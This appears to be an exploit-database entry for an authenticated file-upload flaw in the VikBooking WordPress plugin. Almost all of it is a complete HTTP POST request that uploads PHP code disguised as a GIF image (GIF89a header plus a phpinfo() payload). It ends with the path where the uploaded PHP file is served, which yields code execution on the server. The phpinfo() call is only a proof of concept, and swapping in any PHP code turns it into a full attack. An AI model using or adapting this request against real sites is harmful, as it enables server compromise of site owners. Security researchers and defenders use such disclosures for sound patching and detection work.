Share
## https://sploitus.com/exploit?id=WPEX-ID:1330F8F7-4A59-4E9D-ACAE-21656A4101FE
Edit/add a Characteristics (/wp-admin/admin.php?option=com_vikbooking&task=carat) and upload a fake GIF with PHP code in it as a Characteristic Image:
POST /wp-admin/admin.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------119541905442224294322517652959
Content-Length: 1469
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="caratname"
WiFi
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="caraticon"; filename="phpinfo.php"
Content-Type: image/gif
GIF89a;
<?php phpinfo() ?>
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="resizeto"
250
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="carattextimg"
<i class="fas fa-wifi vbo-icn-carat vbo-pref-color-text"></i>
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="ordering"
1
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="task"
updatecarat
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="whereup"
1
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="option"
com_vikbooking
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="vikwp_nonce"
2817d7732a
-----------------------------119541905442224294322517652959--
PHP file will be at https://example.com/m/wp-content/plugins/vikbooking/site/resources/uploads/phpinfo.php